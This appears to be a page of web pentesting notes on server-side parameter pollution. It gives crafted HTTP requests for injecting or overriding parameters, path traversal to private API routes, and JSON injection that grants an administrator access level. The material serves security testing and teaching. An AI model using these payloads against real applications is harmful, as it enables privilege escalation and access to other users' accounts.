Server Side Parameter Pollution

Place query syntax characters like #, &, and = in your input and observe how the application responds

Example:

GET /profile?user=1001%23//evil.com OR %26role=admin

(URL Encoded: %23># and %26>&)

GET /profile?user=1001%26admin=true

It's essential that you URL-encode the # character. Otherwise the front-end application will interpret it as a fragment identifier and it won't be passed to the internal API.

GET /userSearch?name=peter&back=/home

1 - Try

GET /userSearch?name=peter%23foo&back=/home

GET /userSearch?name=peter%26foo=xyz&back=/home

2 - If you've identified the email parameter, you could add it to the query string 

GET /userSearch?name=peter%26email=foo&back=/home

Overriding parameters

GET /userSearch?name=peter%26name=carlos&back=/home

GET /profile?user=1001%26user=2121

PHP parses the last parameter only. This would result in a user search for carlos.
ASP.NET combines both parameters. This would result in a user search for peter,carlos, which might result in an Invalid username error message.
Node.js / express parses the first parameter only. This would result in a user search for peter, giving an unchanged result.

REST Paths

GET /edit_profile.php?name=peter%2f..%2fadmin

This may result in the following server-side request:

GET /api/private/users/peter/../admin

Structured data

Example 1

POST /myaccount
name=peter

# Server Side:

PATCH /users/7312/update 
{"name":"peter"}

You can attempt to add the access_level parameter to the request as follows:

POST /myaccount 
name=peter","access_level":"administrator

If the user input is added to the server-side JSON data without adequate validation or sanitization, this results in the following server-side request:

PATCH /users/7312/update 
{name="peter","access_level":"administrator"}

Example 2

POST /myaccount
{"name": "peter"}

# Server Side

PATCH /users/7312/update
{"name":"peter"}

Add access_level

POST /myaccount
{"name": "peter\",\"access_level\":\"administrator"}

# Server side

PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}

Burp Extension - Backslash Powered Scanning

Backslash Powered Scanning: hunting unknown vulnerability classesPortSwigger Research

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Hacking APIs: Breaking Web Application Programming Interfaces A crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
Black Hat GraphQL: Attacking Next Generation APIs This hands-on book teaches penetration testers how to identify vulnerabilities in apps that use GraphQL, a data query and manipulation language for APIs adopted by major companies like Facebook and GitHub.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousMass Assignment NextIDOR

Last updated 1 month ago